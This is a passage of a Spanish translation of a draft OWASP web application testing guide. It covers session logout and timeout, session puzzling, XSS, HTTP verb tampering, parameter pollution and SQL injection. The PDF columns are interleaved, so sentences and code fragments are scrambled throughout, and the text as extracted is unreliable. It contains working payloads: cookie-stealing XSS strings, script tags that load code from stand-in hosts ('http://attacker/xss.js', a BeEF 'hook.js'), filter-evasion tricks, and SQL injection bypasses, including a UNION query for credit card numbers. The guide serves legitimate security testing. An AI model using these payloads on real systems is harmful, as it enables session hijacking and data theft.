Si estas pruebas no muestran vulnerabilidades en alguna página en Compruebe si la aplicación solicita al usuario su autenticación; si solicita
particular, pruebe al menos algunas páginas más de la aplicación que se una dirección URL de un punto de entrada a la aplicación. Habiendo
consideran críticas para la seguridad, para garantizar que la terminación iniciado una sesión en la aplicación probada, realice un cierre de sesión
de la sesión es reconocida correctamente por estas áreas de la aplicación. en el sistema SSO. Intente acceder a un área autenticada de la aplicación
probada.
Resultado esperado:
Resultado esperado:
Ningún dato que debería ser visible únicamente por usuarios
autenticados debe ser visibles en las páginas examinadas al realizar las Se espera que la invocación de una función de cierre de sesión en una
pruebas. Idealmente, la aplicación debe redirigirse a una zona pública o a aplicación web conectada a un sistema SSO, o en el mismo sistema SSO,
un formulario de registro al acceder a áreas autenticadas después del cause el cierre global de todas las sesiones. Una autenticación del usuario
cierre de la sesión. No debería ser necesario para la seguridad de la debería ser necesaria para acceder a la aplicación después del cierre de la
aplicación, pero establecer nuevos valores para las cookies de sesión sesión en el sistema SSO y la aplicación conectada.
después de desconectarse es considerado como una buena práctica.
Herramientas
Pruebas de tiempo de caducidad de sesión:
• “Burp Suite - Repeater”: portswigger.net
Determine un tiempo de caducidad de sesión realizando solicitudes a una
página en el área de autenticación de la aplicación web con incremento de
los intervalos de tiempo. Si aparece un comportamiento de cierre de
sesión, el intervalo de tiempo usado coincide aproximadamente con el Referencias
valor del tiempo de caducidad de la sesión.
Libros Blancos
Un cierre de sesión causado por inactividad dentro de un tiempo de • “Cookie replay attacks in ASP.NET when using forms authentication”:
caducidad debe tener los mismos resultados descritos anteriormente
vanstechelman.eu
para la prueba de terminación de sesión de servidor.
Resumen invalida la sesión del usuario actual y borra todos los datos almacenados
en el cliente.
En esta fase, los evaluadores comprueban que la aplicación cierra
automáticamente la sesión cuando un usuario ha permanecido inactivo
durante un cierto periodo de tiempo, asegurando que no se pueda
"reutilizar" la misma sesión y que ningún dato sensible permanezca Ambas acciones deben implementarse cuidadosamente, con el fin de
almacenado en la caché del navegador. evitar introducir debilidades que podrían ser aprovechadas por un
atacante para obtener acceso no autorizado si el usuario olvidó cerrar la
sesión desde la aplicación. Más específicamente, en cuanto a la función de
cierre de sesión, es importante asegurarse de que todas las fichas de
Todas las aplicaciones deben implementar un tiempo de cierre de sesión sesión (por ejemplo las cookies) sean destruidas o queden inservibles, y
por inactividad. Este tiempo de cierre define el período que una sesión se que se apliquen controles adecuados desde el lado del servidor para
mantendrá activa en caso de que no haya actividad por parte del usuario., evitar la reutilización de las fichas de sesión. Si estas acciones no se llevan
Cierre e invalide la sesión una vez excedido el período de inactividad a cabo correctamente, un atacante podría reproducir estas fichas de
definida desde la última petición HTTP recibida por la aplicación web sesión para "resucitar" la sesión de un usuario legítimo y hacerse pasar
para un determinado identificador de sesión. El tiempo de cierre más por él o ella (este ataque es generalmente conocido como 'cookie replay').
adecuado debe ser un equilibrio entre la seguridad (menor tiempo de Por supuesto, un factor atenuante es que el atacante debe ser capaz de
espera) y usabilidad (mayor tiempo de espera), y mucho depende del acceder a las fichas (que se almacenan en el navegador de la víctima),
nivel de sensibilidad de los datos manejados por la aplicación. pero, en varios casos, esto puede no ser particularmente difícil o
imposible.
Si la cookie contiene algún dato relacionado con el tiempo (por ejemplo, la Pruebas del Session puzzling (OTG-SESS-008)
hora de registro, o la última hora de acceso o la fecha de caducidad de una
cookie persistente), entonces es posible que el cliente tenga una Resumen
participación en el tiempo de cierre. En este caso, los evaluadores podrían
tratar de modificar la cookie (si no está criptograficamente protegida) y La sobrecarga de variables de sesión (también conocida como Session
ver qué pasa con la sesión. Por ejemplo, los evaluadores pueden Puzzling) es una vulnerabilidad al nivel de la aplicación que permite a un
establecer la fecha de caducidad de la cookie en un futuro lejano y ver si atacante realizar una variedad de acciones maliciosas que incluyen, pero
se puede prolongar el período de sesiones. no se limitan a:
Como regla general, debe comprobarse todo del lado del servidor y no • Esquivar los mecanismos de autenticación de la aplicación y hacerse pasar
debe ser posible, mediante la reconfiguración de las cookies de sesión a por usuarios legítimos.
los valores anteriores, acceder a la aplicación otra vez.
• Elevar los privilegios de una cuenta de usuario maliciosa, en un entorno que,
de lo contrario, sería considerado infalible.
Pruebas de Caja Gris • Saltarse las fases de calificación en los procesos de fases múltiples, incluso
si el proceso incluye todas las restricciones a nivel de código comúnmente
El evaluador debe verificar que: recomendadas.
• Manipular los valores del lado del servidor de forma indirecta para que no
puedan ser predichos o detectados.
• La función de cierre de sesión destruye eficazmente todas las fichas de
sesión, o por lo menos las inhabilita. • Ejecutar ataques tradicionales en lugares previamente inaccesibles, o incluso
que se consideran seguros.
• El servidor realiza los controles adecuados en el estado de la sesión,
impidiendo al atacante reproducir identificadores de sesión previamente
destruidos.
Esta vulnerabilidad se produce cuando una aplicación utiliza la misma
• El tiempo de cierre es establecido correctamente por el servidor. Si el variable de sesión para más de un propósito. Potencialmente un atacante
servidor utiliza un tiempo de expiración que se lee de una ficha de sesión que puede acceder a páginas en un orden no previsible por parte de los
es enviada por el cliente (aunque esto no es recomendable), entonces la ficha desarrolladores para que la variable de sesión se configure en un
debe estar criptográficamente protegida contra la manipulación. contexto y luego se utilice en otro.
Tome en cuenta que lo más importante es que la aplicación invalide la Por ejemplo, un atacante puede utilizar la sobrecarga de variables de
sesión en el servidor. Generalmente esto significa que el código debe sesión para eludir los mecanismos de autenticación de la aplicación, que
invocar los métodos apropiados, por ejemplo, HttpSession.invalidate() en garantizan la autenticación mediante la validación de la existencia de
Java y Session.abandon() en .NET. variables de sesión que contengan valores relacionados con la identidad,
que normalmente se almacenan en la sesión después de un proceso de
autenticación exitoso. Esto significa que, primero, un atacante tiene
acceso a una ubicación en la aplicación que establece el contexto de la
Borrar las cookies en el navegador es recomendable, pero no es sesión y, luego, accede a lugares privilegiados que examinan este
estrictamente necesario, ya que si bien se invalida la sesión en el servidor, contexto.
tener la cookie en el navegador no ayudará a un atacante.
Cómo probar
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
147
Guia de pruebas 4.0 "Borrador"
Prueba de Caja Negra scripting, inyección SQL, inyección de intérprete, ataques ataques
locale/Unicode, ataques al sistema de archivo y desbordamiento de búfer.
Esta vulnerabilidad puede ser detectada y explotada enumerando todas
las variables de sesión que utiliza la aplicación y elcontexto en el que son
válidas. En particular, esto es posible accediendo a una secuencia de
puntos de entrada y luego examinando los puntos de salida. En el caso de Nunca se debe confiar en los datos de una entidad externa o del cliente, ya
las pruebas de caja negra, este procedimiento es difícil y requiere algo de que pueden ser arbitrariamente adulterados por un atacante. "Todas las
suerte ya que cada secuencia diferente podría llevar a un resultado entradas son malignas", dice Michael Howard en su famoso libro "Writing
diferente. Secure Code" (Escribiendo Código Seguro). Esta es la regla número uno.
Lamentablemente, las aplicaciones más complejas a menudo tienen un
gran número de puntos de entrada, lo que hace difícil para que un
desarrollador haga cumplir esta regla. Este capítulo describe las pruebas
Ejemplos de validación de datos. Esta es la tarea de probar todas las formas
posibles de entrada para comprender si la aplicación valida lo suficiente
Un ejemplo muy simple podría ser la funcionalidad de restablecimiento el ingreso de datos antes de usarlos.
de contraseña que, en el punto de entrada, puede solicitar al usuario que
proporcione cierta información de identificación que podría ser el
nombre del usuario o la dirección de correo electrónico. Esta página
podría rellenar, entonces, la sesión con estos valores de identificación que Pruebas de la reflexión del Cross site scripting (OTG-INPVAL-001)
son recibidos directamente del lado del cliente u obtenidos de consultas o
cálculos basados en la información de entrada recibida. En este punto Resumen
pueden haber algunas páginas en la aplicación donde se muestran datos
privados basados en este objeto de sesión. De esta manera el atacante La reflexión del Cross-site Scripting (XSS) ocurre cuando un atacante
podría eludir el proceso de autenticación. inyecta un código ejecutable en el navegador, dentro de una sola
respuesta HTTP. El ataque inyectado no se almacena dentro de la
aplicación, es no-persistente y sólo afecta a los usuarios que abren una
página web de terceros o un vínculo diseñado con mala intención. La
Pruebas de Caja Gris cadena de ataque se incluye como parte del diseño de los parámetros URL
o HTTP, que se procesan incorrectamente por la aplicación y se
La forma más efectiva para detectar estas vulnerabilidades es a través de devuelven a la víctima.
una revisión del código fuente.
Las reflexiones de XSS son los tipos de ataque XSS más frecuentes
Referencias encontrados en la naturaleza. Los ataques de reflexión XSS también son
conocidos como ataques XSS no persistentes y, puesto que la carga de
Libros Blancos ataque es entregada y ejecutada mediante una sola solicitud y respuesta,
también se les conoce como XSS de primer orden o tipo 1.
• Session Puzzles: puzzlemall.googlecode.com
Pruebas de validación de entradas Comúnmente, el código del intruso es escrito en el lenguaje Javascript,
pero también se utilizan otros lenguajes, por ejemplo, ActionScript y
La debilidad de seguridad de las aplicaciones web más común es el no VBScript. Los atacantes suelen aprovechar estas vulnerabilidades para
poder validar correctamente los datos de entrada que vienen del cliente o instalar registradores de claves, robar las cookies de la víctima, realizar
del medio ambiente antes de usarlo. Esta debilidad conduce a casi todas robos del portapapeles y cambiar el contenido de la página (por ejemplo,
las vulnerabilidades principales en aplicaciones web, tales como cross site enlaces de descarga).
Una de las principales dificultades en la prevención de vulnerabilidades [3] Para cada prueba de entrada intentada en la fase anterior, el
XSS es la correcta codificación de caracteres. En algunos casos, el servidor evaluador analiza el resultado y determina si representa una
web o la aplicación web podrían no estar filtrando algunas codificaciones vulnerabilidad que tiene un impacto realista en materia de seguridad de
de caracteres; así que, por ejemplo, la aplicación web puede filtrar y sacar la aplicación web. Esto requiere examinar la HTML de la página web
"<script>", pero podría no filtrar %3cscript%3e que simplemente incluye resultante, en busca de la información de entrada para la prueba. Una vez
otra codificación de etiquetas. encontrada, el evaluador identifica los caracteres especiales que no
fueron codificados correctamente, reemplazados o filtrados. El conjunto
de caracteres especiales vulnerables sin filtrar dependerán del contexto
de esa sección de HTML.
Cómo probar
Idealmente, todos los caracteres especiales de HTML se reemplazarán con
Prueba de Caja Negra entidades HTML. Las entidades HTML claves para identificar son:
Sin embargo, una lista completa de entidades está definida por las
[2] Analice cada vector de entrada para detectar posibles especificaciones de HTML y XML. Wikipedia tiene una referencia
vulnerabilidades. Para la detección de una vulnerabilidad XSS, el completa [1].
evaluador suele utilizar datos de entrada especialmente diseñados con
cada vector de entrada. Estos datos de entrada son normalmente
inofensivos, pero desencadenan respuestas desde el navegador web que
manifiesta su vulnerabilidad. Los datos para pruebas pueden generarse En el framework de una acción de HTML o código JavaScript, un conjunto
utilizando un distorsionador de aplicaciones web, una lista automatizada diferente de caracteres especiales se necesitarán para escapar, codificar,
predefinida de cadenas de ataque conocidas o manualmente. reemplazar o filtrar. Estos caracteres incluyen:
\n (new line)
Algunos ejemplos de esta información de entrada son:
\r (carriage return)
\\ (backslash)
Para tener una lista completa de posibles cadenas de prueba, vea el archivo
XSS Filter Evasion Cheat Sheet.
Ejemplo 1
http://example.com/index.php?user=<script>alert(123)</script>
Ejemplo 2
Pruebe otra pieza de código (enlace) La mayor parte de la prevención XSS depende de la desinfección de la
aplicación web de datos no confiables del usuario. Hay varios
mecanismos disponibles para que los desarrollaldores realicen la
desinfección, como devolver un error, quitar, codificar, sustituir datos de
entrada no válida. El modo por el cual la aplicación detecta y corrige la
entrada inválida es otra debilidad principal en la prevención de XSS. Una
lista negra podría no incluir todas las cadenas de ataque posibles, una
“><script >alert(document.cookie)</script >
lista blanca puede ser excesivamente permisiva, la desinfección puede
fallar o un tipo de entrada puede calificarse incorrectamente como
confiable y mantenerse sin desinfección. Todo esto permite a los
atacantes burlar los filtros XSS.
“%3cscript%3ealert(document.cookie)%3c/script%3e
Ya que estos filtros se basan en una lista negra, no pueden bloquear todos
los tipos de expresiones. De hecho, hay casos en que una explotación XSS
puede llevarse a cabo sin el uso de etiquetas <script> e incluso sin el uso
de caracteres tales como "< > y / que comúnmente se filtran. Ejemplo 5: Para evitar la filtración no-recurrente
<scr<script>ipt>alert(document.cookie)</script>
<input type=”text” name=”state” value=”INPUT_FROM_USER”>
Entonces el atacante puede enviar el siguiente código: Ahora suponga que los desarrolladores del sitio objetivo implementaron el
siguiente código para proteger la entrada de la inclusión de script externo:
“ onfocus=”alert(document.cookie)
<?
$re = “/<script[^>]+src/i”;
En algunos casos, es posible que los filtros basados en la firma pueden ser {
simplemente derrotados ofuscando el ataque. Por lo general, usted puede
hacer esto mediante la introducción de variaciones inesperadas en la sintaxis o echo “Filtered”;
en la codificación. Estas variaciones se toleran por parte de los navegadores
como HTML, válidos cuando se devuelve el código y, sin embargo, también return;
podrían ser aceptadas por el filtro.
}
<script src=”http://attacker/xss.js”></script>
Resultado esperado
que es un ataque común. Pero, en este caso, es posible eludir la Vea los apuntes de repaso de evasión de filtros XSS para obtener una lista
desinfección usando el carácter ">" con un atributo entre script y src como más detallada de las técnicas de evasión de filtros. Por último, analizar las
este: respuestas puede ser complejo. Una manera simple de hacer esto es usar
un código que lance un cuadro de diálogo, como en nuestro ejemplo. Esto
normalmente indica que un atacante podría ejecutar un código JavaScript
http://example/?var=<SCRIPT%20a=”>”%20SRC=”http://attacker/xss arbitrario de su elección en los navegadores de los visitantes.
.js”></SCRIPT>
Las pruebas de Caja Gris son similares a las pruebas de Caja Negra. En las
Esto explotará la vulnerabilidad de reflexión del Cross-site Scripting
pruebas de Caja Gris, el evaluador de edición tiene un conocimiento
mostrada anteriormente, ejecutando el código JavaScript almacenado en el
parcial de la aplicación. En este caso, la información relativa a la entrada
servidor web del atacante como si se originara desde el sitio web de la
del usuario, los controles de validación de entrada y cómo se devuelve la
víctima, http://example/.
información ingresada por el usuario al mismo usuario, podrían ser
conocidos por el evaluador de edición.
Ejemplo 7: Contaminación del Parámetro HTTP (HTTP Parameter Si el código fuente está disponible (Caja Blanca), deben analizarse todas
Pollution (HPP)) las variables recibidas de los usuarios. Además, el evaluador debe
analizar los procedimientos de desinfección implementados para decidir
Otro método para eludir los filtros es la contaminación del parámetro si estos pueden ser eludidos.
HTTP. Esta técnica fue introducida por Stefano di Paola y Luca Carettoni
en el 2009, durante la Conferencia OWASP en Polonia. Vea la "prueba de
contaminación del parámetro HTTP" para obtener más información. Esta
Herramientas
técnica de evasión consiste en dividir un vector de ataque entre los
múltiples parámetros que tengan el mismo nombre. La manipulación del
• OWASP CAL9000
valor de cada parámetro depende de cómo cada tecnología web analiza
estos parámetros, por lo que este tipo de evasión no siempre es posible. Si
CAL9000 es una colección de herramientas de prueba de seguridad en
el ambiente de prueba concatena los valores de todos los parámetros con
aplicaciones web, que complementa el conjunto actual de proxys web y
el mismo nombre, entonces el atacante podría utilizar esta técnica para escáneres automatizados. Se presenta como una referencia en:
evitar los mecanismos de seguridad basados en el patrón.
sec101.sourceforge.net
Ataque normal:
• PHP Charset Encoder(PCE):
http://example/page.php?param=<script>[...]</script> yehg.net
• HackVertor: (XSS). Ofrece resultados de análisis de cero falsos positivos con su triple
motor de navegación único (Trident, WebKit y Gecko) escáner
businessinfo.co.uk incrustados. Se afirma que tiene la segunda carga de XSS más grande del
mundo, de aproximadamente 1600+ XSS cargas útiles distintivas para la
Ofrece varias docenas de codificaciones flexibles para ataques de detección eficaz de vulnerabilidades XSS y desvios WAF. El motor de
manipulación de cadena avanzada. Scripting de Xenotix le permite crear casos de prueba personalizados y
add-ons en la API de Xenotix. Tiene incorporado un módulo de
recolección de información abundante para reconocimiento de objetivos.
El framework de explotación incluye módulos de explotación de ofensiva
• WebScarab: WebScarab es un framework para analizar las aplicaciones que
XSS para la creación de pruebas de penetración y prueba de creación de
se comunican mediante los protocolos HTTP y HTTPS: owasp.org
concepto.
• XSS-Proxy: xss-proxy.sourceforge.net
Referencias
XSS-Proxy es una herramienta avanzada de Cross-Site-Scripting (XSS).
Recursos OWASP
• ratproxy: code.google.com
Libros Blancos
• OWASP Zed Attack Proxy (ZAP):
• CERT - Malicious HTML Tags Embedded in Client Web Requests: Read
OWASP_Zed_Attack_Proxy_Project
• Rsnake - XSS Cheat Sheet: Read
ZAP es una herramienta de penetración integrada, fácil de usar para
encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser • cgisecurity.com - The Cross Site Scripting FAQ: Read
utilizada por personas con un amplio espectro de experiencia en seguridad y
por eso es ideal para desarrolladores y evaluadores funcionales que son • G.Ollmann - HTML Code Injection and Cross-site scripting: Read
novatos realizando pruebas de penetración. ZAP ofrece escáneres
automatizados, así como un conjunto de herramientas que permiten • A. Calvo, D.Tiscornia - alert(‘A javascritp agent’): Read ( To be published )
encontrar las vulnerabilidades de seguridad manualmente.
• S. Frei, T. Dübendorfer, G. Ollmann, M. May - Understanding the Web
browser threat: Read
• Escaneo de puertos en hosts internos ("internos" en relación a los usuarios de la • User/Profiles page: la aplicación permite al usuario editar o cambiar los
aplicación web) datos del perfil tales como nombre, apellido, apodo, avatar, foto, dirección,
etc.
• Explotación basada en el navegador de entrega dirigida
• Shopping cart: la aplicación permite al usuario guardar artículos en el
• Otras actividades maliciosas carrito de compras que pueden ser revisados posteriormente.
Un XSS almacenado no necesita un enlace malicioso para ser explotado. • Application settings/preferences: aplicación que permite al usuario
Una explotación exitosa se produce cuando un usuario visita una página establecer sus preferencias.
con un XSS almacenado. Las fases siguientes se relacionan con una
situación de ataque XSS almacenado normal: • Forum/Message board: la aplicación permite intercambiar mensajes entre
usuarios.
aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2F
Nota: Todas las áreas de la aplicación que son accesibles por el administrador script%3E
deben ser probadas para identificar la presencia de cualquier información
enviada por los usuarios.
Resultado esperado:
En este caso, el evaluador necesita encontrar una manera de inyectar el código <input class=”inputbox” type=”text” name=”email” size=”40”
fuera de la etiqueta <input> así como: value=”aaa@aa.com”><script>alert(document.cookie)</script>
• Inyectar un gancho de JavaScript que se comunica con el framework del Carga de archivos
navegador de explotación del atacante (BeEF).
Si la aplicación web permite la carga de archivos, es importante
• Esperar a que el usuario vea la aplicación en la página vulnerable donde se comprobar si es posible cargar contenido HTML. Por ejemplo, si se
muestra la información ingresada y almacenada. permiten archivos HTML o TXT, una carga XSS puede ser inyectada en el
archivo subido. El evaluador de edición también debe verificar si la carga
• Controlar la aplicación del navegador del usuario mediante la consola de BeEF. de archivos permite el ajuste arbitrario de caracteres MIME.
El gancho de JavaScript puede ser inyectado mediante la explotación de la Considere la siguiente petición HTTP POST para carga de archivos:
vulnerabilidad XSS en la aplicación web.
aaa@aa.com”><script src=http://attackersite/hook.js></script>
Content-Disposition: form-data; name=”uploadfile1”;
filename=”C:\Documents and Settings\test\Desktop\test.txt”
Content-Type: text/plain
Content-Type: text/html
Pruebas de Caja Gris Nota: La tabla anterior es sólo un resumen de los parámetros más
importantes, pero deben investigarse los parámetros de entrada de
La prueba de Caja Gris es similar a la prueba de Caja Negra. En la prueba usuario.
de Caja Gris, el evaluador de edición tiene conocimiento parcial sobre la
aplicación. En este caso, al respecto de la información ingresada por el
usuario, controles de validación de ingresos y almacenamiento de datos
Tools
podrían ser conocidos por el evaluador de edición.
• OWASP CAL9000
• BeEF: beefproject.com
BeEF es el explotador del framework del navegador (browser exploitation • Apuntes de repaso de evasión de filtros XSS
framework); una herramienta profesional para demostrar las
vulnerabilidades del navegador en tiempo real.
Libros
• XSS-Proxy: xss-proxy.sourceforge.net • Joel Scambray, Mike Shema, Caleb Sima - “Hacking Exposed Web
Applications”, Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
XSS-Proxy es una herramienta avanzada de ataque de Cross-Site-Scripting
(XSS. • Dafydd Stuttard, Marcus Pinto - “The Web Application’s Handbook -
Discovering and Exploiting Security Flaws”, 2008, Wiley, ISBN 978-0-470-
17077-9
• Backframe: gnucitizen.org • Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov,
Anton Rager, Seth Fogie - “Cross Site Scripting Attacks: XSS Exploits and
Backframe es una consola de ataque completa para explotar navegadores Defense”, 2007, Syngress, ISBN-10: 1-59749-154-3
web, usuarios web y aplicaciones web.
Libros Blancos
• OWASP ZAP: owasp.org
• RSnake: “XSS (Cross Site Scripting) Cheat Sheet”:
WebScarab es un framework para analizar aplicaciones que se comunican
usando los protocolos HTTP y HTTPS. owasp.org
El Proxy Burp es un servidor proxy interactivo de HTTP/S que sirve para cert.org
atacar y probar aplicaciones web.
• Amit Klein: “Cross-site Scripting Explained”:
courses.csail.mit.edu
• XSS Assistant: greasespot.net
• Gunter Ollmann: “HTML Code Injection and Cross-site
Es un Greasemonkey script que permite a los usuarios el acceso fácil a
cualquier aplicación web en busca de fallas en el cross-site-scripting. Scripting”: technicalinfo.net
ZAP es una herramienta de penetración integrada, fácil de usar para Perspective”: leviathansecurity.com
encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser
utilizada por personas con una amplia experiencia en seguridad y por eso es
ideal para desarrolladores y evaluadores funcionales que son novatos
realizando pruebas de penetración. ZAP ofrece escáneres automatizados, así Pruebas de manipulación de verbos en HTTP (OTG-INPVAL-003)
como un conjunto de herramientas que permiten encontrar las
vulnerabilidades de seguridad manualmente. Resumen
'verbo', el estándar de HTTP 1.1 se refiere a estas solicitudes como contactos JavaScript y AJAX pueden enviar métodos distintos a GET y
métodos HTTP distintos. POST.
La especificación completa de HTTP 1.1 [1] define los siguientes métodos Mientras la aplicación web que se está probando no se contacte
válidos de solicitudes HTTP, o verbos: específicamente con un método HTTP no estándar, las pruebas de
manipulación de verbo HTTP son bastante simples. Si el servidor acepta
una petición que no sea GET o POST, la prueba fracasa. Las soluciones son
OPTIONS
deshabilitar todas las funciones que no sean GET o POST en el servidor de
GET aplicaciones web, o en un firewall de aplicaciones web.
HEAD
MKCOL
COPY Recomendamos que use una herramienta para hacer esto, aunque le
mostraremos cómo hacerlo manualmente también.
MOVE
LOCK
UNLOCK
Pruebas de manipulación manual de verbos en HTTP
1.5 PUT
[METHOD] /[index.htm] HTTP/1.1
host: www.example.com
host: www.example.com
host: www.example.com
OPTIONS /index.html HTTP/1.1
host: www.example.com
1.8 CONNECT
host: www.example.com
GET /index.html HTTP/1.1
host: www.example.com
1.3 HEAD
• Para cada método y/o archivo de texto con el método, envíe la solicitud a su
servidor web vía netcat o telnet en el puerto 80 (HTTP):
HEAD /index.html HTTP/1.1
host: www.example.com
nc www.example.com 80 < OPTIONS.http.txt
1.4 POST
host: www.example.com
• Aunque cada método HTTP puede devolver potencialmente resultados printf “$webservmethod “ ;
diferentes, hay sólo un resultado válido para todos los métodos que no
sean GET y POST. printf “$webservmethod / HTTP/1.1\nHost: $1\n\n” | nc -q 1 $1 80 | grep
“HTTP/1.1”
Referencias
Libros Blancos
http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-
verb-tampering
Resumen
Abastecer múltiples parámetros HTTP con el mismo nombre puede causar que
una aplicación interprete los valores de maneras imprevistas. Al explotar estos
efectos, un atacante puede ser capaz de esquivar la validación de entrada,
provocar errores de aplicación o modificar valores de variables internas. Ya que
la contaminación de parámetros HTTP (HTTP Parameter Pollution [abreviado
HPP]) afecta los cimientos de la construcción de las tecnologías web, existen los
ataques del lado del servidor y del cliente.
40gmail.com(attacker email)&ok=Invite
Uno de estos defectos, que afectan a ModSecurity SQL Injection Core Rules,
representa un ejemplo perfecto del desajuste de impedancia entre
aplicaciones y filtros.
Como ejemplo, la URL /index.aspx?page=select 1&page = 2,3 de la tabla Dada la URL y la cadena de consulta:
no activaría el filtro ModSecurity, sin embargo, la capa de aplicación
concatenaría la entrada de vuelta convirtiéndola nuevamente en la http://example.com/?color=red&color=blue
cadena maliciosa completa.
http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos.
particular para probar, uno puede editar los datos GET o POST
interceptando la solicitud, o cambiando la cadena de consulta después de
que la página de respuesta se cargue. Para probar las vulnerabilidades
HPP, simplemente añada el mismo parámetro para los datos GET o POST,
pero asignando un valor diferente.
http://example.com/?search_string=kittens
http://example.com/?mode=guest&search_string=kittens&num_results=100
http://example.com/?mode=guest&search_string=kittens&num_results=100&se
arch_string=puppies
(fuente: Media:AppsecEU09_CarettoniDiPaola_v0.8.pdf )
[1] Envíe una solicitud HTTP que contenga el nombre del parámetro En particular, preste atención a las respuestas que tengan vectores HPP
estándar y el valor; también grabe la respuesta HTTP. Por ejemplo, dentro de datos, src, atributos href o formularios de acciones. Otra vez, si
page?par1=val1 este comportamiento predeterminado revela o no una vulnerabilidad
potencial, depende de la validación de entrada específica, filtrado y
[2] Cambie el valor del parámetro con un valor alterado, envíe y grabe la aplicación lógica del negocio. Además, es importante hacer notar que esta
respuesta HTTP. Por ejemplo, page?par1=HPP_TEST1 vulnerabilidad también puede afectar los parámetros de la cadena de
consulta utilizados en XMLHttpRequest (XHR), para la creación del
[3] Envíe una nueva solicitud combinando el paso (1) y (2). Una vez más, atributo de tiempo de ejecución y otras tecnologías de plugin (por
guarde la respuesta HTTP. Por ejemplo, page?par1=val1&par1=HPP_TEST1 ejemplo variables de Adobe Flash flashvars).
[4] Compare las respuestas obtenidas durante todos los pasos anteriores.
Si la respuesta de (3) es diferente de (1) y la respuesta de (3) también es
diferente a (2), hay un desajuste de impedancia que puede, finalmente, Herramientas
ser objeto de abuso para disparar las vulnerabilidades HPP.
[1] OWASP ZAP HPP Passive/Active Scanners
Referencias
HPP del lado del cliente
Libros Blancos
Del mismo modo al HPP de lado del servidor, la prueba manual es la única
técnica confiable para auditar aplicaciones web con el fin de detectar [3] HTTP Parameter Pollution - Luca Carettoni, Stefano di Paola
vulnerabilidades de contaminación de parámetro que afectan a los
componentes del lado del cliente. Mientras que en la variante del lado del [4] Split and Join (Bypassing Web Application Firewalls with HTTP Parameter
servidor el atacante aprovecha una aplicación web vulnerable para Pollution) - Lavakumar Kuppan
acceder a datos protegidos o realizar acciones no permitidas o que no se
[5] Client-side Http Parameter Pollution Example (Yahoo! Classic Mail flaw) -
deberían ejecutar, los ataques del lado del cliente apuntan a subvertir
Stefano di Paola
tecnologías y componentes de cliente.
[6] How to Detect HTTP Parameter Pollution Attacks - Chrysostomos Daniel
Resumen
Semejante al HPP del lado del servidor, contamine cada parámetro HTTP
con %26HPP_TEST y busque ocurrencias de decodificación de la url desde Un ataque de inyección SQL consiste en la inserción o "inyección" de una
la carga suministrada por el usuario: consulta SQL parcial o completa a través de los datos de entrada o
transmitidos desde el cliente (navegador) hacia la aplicación web. Un
ataque exitoso de inyección SQL puede leer datos sensibles de la base de
datos, modificar datos de la base de datos (insertar/actualizar/eliminar),
• &HPP_TEST
ejecutar operaciones administrativas de la base de datos (por ejemplo,
apagar el DBMS), recuperar el contenido de un archivo existente en el
• &HPP_TEST
sistema de archivos DBMS o escribir archivos en el sistema de archivos y,
• … and others en algunos casos, emitir comandos al sistema operativo. Los ataques de
inyección SQL son un tipo de ataque de inyección en los que los comandos
SQL se inyectan en la entrada de datos planos para afectar la ejecución de
instrucciones SQL predefinidas.
Sobre las técnicas de inyección SQL para explotar los defectos, hay cinco
select title, text from news where id=$id técnicas comunes. También las técnicas, a veces, se pueden utilizar de forma
combinada (e.g. operador de unión y fuera de banda):
Técnicas de detección
El evaluador tiene que hacer una lista de todos los campos de entrada completo, como en los ejemplos, ofrece una gran cantidad de información
cuyos valores podrían utilizarse en la elaboración de una consulta SQL, al evaluador para montar un ataque de inyección eficaz.
incluidos los campos ocultos de las solicitudes POST y luego probarlos
por separado, tratando de interferir en la consulta y generar un error.
Considere también las cookies y encabezados HTTP.
Sin embargo, las aplicaciones a menudo no proporcionan mucho detalle:
un simple '500 Server Error' o se emite una página de error
personalizado, que significa que necesitamos utilizar técnicas de
La primera prueba consiste, generalmente, en agregar una comilla inyección ciega. En todo caso, es muy importante comprobar cada campo
sencilla (') o un punto y coma (;) al campo o parámetro que está bajo por separado: sólo una variable debe cambiar mientras que todas las
análisis. La primera se utiliza en SQL como un terminador de la cadena y, otras permanecen constantes, a fin de entender precisamente qué
si la aplicación no la filtra, daría lugar a una consulta incorrecta. El parámetros son vulnerables y cuáles no.
segundo se utiliza para terminar una instrucción SQL y, si no se filtra,
también es probable que genere un error. El resultado de un campo
vulnerable podría parecerse al siguiente (en un Microsoft SQL Server, en
este caso): Pruebas de inyección SQL estándar
$username = 1’ or ‘1’ = ‘1
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
http://www.example.com/index.php?username=1’%20or%20’1’%20=%20
’1&password=1’%20or%20’1’%20=%20’1
(Debido a la inclusión de un comentario delimitador en el valor de
$username la parte de la clave de la consulta se omitirá.)
Después de un corto análisis, notamos que la consulta devuelve un valor La solicitud de URL será:
(o un conjunto de valores) porque la condición siempre es verdadera (o
1=1). De esta manera, el sistema ha autenticado al usuario sin saber el
nombre de usuario y contraseña. $password = foo
SELECT * FROM products WHERE id_product=$id_product SELECT * FROM products WHERE id_product=$id_product
Considere tambien una solicitud a un script que ejecuta la consulta anterior: Una manera de explotar el escenario anterior podría ser:
Cuando el evaluador intenta un valor válido (por ejemplo, 10 en este caso), la De esta manera, es posible ejecutar muchas consultas en línea e independientes de
aplicación devolverá la descripción de un producto. Una buena manera de la primera consulta.
comprobar si la aplicación es vulnerable, en este caso, es jugar con la lógica,
utilizando los operadores AND y OR.
Considere la consulta: Incluso el lenguaje SQL es un estándar. Cada DBMS tiene su particularidad, y
difieren unos de otros en muchos aspectos como comandos especiales, funciones
para recuperar datos como nombres de usuarios y bases de datos, funciones, líneas
http://www.example.com/product.php?id=10 AND 1=2 de comentarios, etc.
1) La primera forma de averiguar para qué sirve una base de datos de acceso
En este caso, probablemente la aplicación devuelva un mensaje diciéndonos que no restringido es observar el error devuelto por la aplicación. A continuación
hay contenido disponible o una página en blanco. Entonces el evaluador puede encontrará algunos ejemplos:
enviar una instrucción verdadera y comprobar si hay un resultado válido:
“’” at character 56 in /www/site/test.php on line 121. SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION
ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
